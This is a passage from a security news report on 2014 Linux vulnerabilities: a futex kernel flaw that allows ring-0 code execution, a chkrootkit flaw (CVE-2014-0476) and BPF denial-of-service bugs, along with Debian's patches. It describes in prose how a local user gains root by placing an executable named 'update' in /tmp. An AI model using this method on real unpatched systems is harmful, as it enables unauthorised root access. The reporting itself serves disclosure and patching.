the waiter structure can be altered. When later woken up, the altered waiter can result in arbitrary code execution in ring 0," Cook wrote Thursday on Seclists.org. "This flaw is especially urgent to fix because futex tends to be available within most Linux sandboxes (because it is used as a glibc pthread primitive)." CHKROOTKIT - ANOTHER CRITICAL FLAW The vulnerability highlighted two days after Thomas Stangner reported a serious flaw in the chkrootkit (Check Rootkit), a rootkit detector, that allows a local attacker to gain root access to gain root control by executing malicious code inside the /tmp directory. A common Unix-based program, chkrootkit helps system administrators to check their systems for known rootkits. The vulnerability in the chkrootkit, assigned CVE-2014-0476 ID, actually resides in the slapper() function in the shell script chkrootkit package. A non-root user can place any malicious executable file named 'update' in /tmp folder, which will get executed as root whenever chkrootkit will scan this directory for rootkits. OTHER VULNERABILITIES IN LINUX KERNEL Another security issues (CVE-2014-3144 and CVE-2014-3145) also have been discovered in the Linux kernel that could allow any local user to cause a Denial of Service (DoS) attack via crafted BPF instructions. Debian has issued the patches for these vulnerabilities and encouraged Linux users to upgrade their Linux packages highlighting that the issue has been fixed in the stable distribution, version 3.2.57-3+deb7u2, and will be fixed in the unstable distribution as soon as possible. sursa: http://thehackernews.com/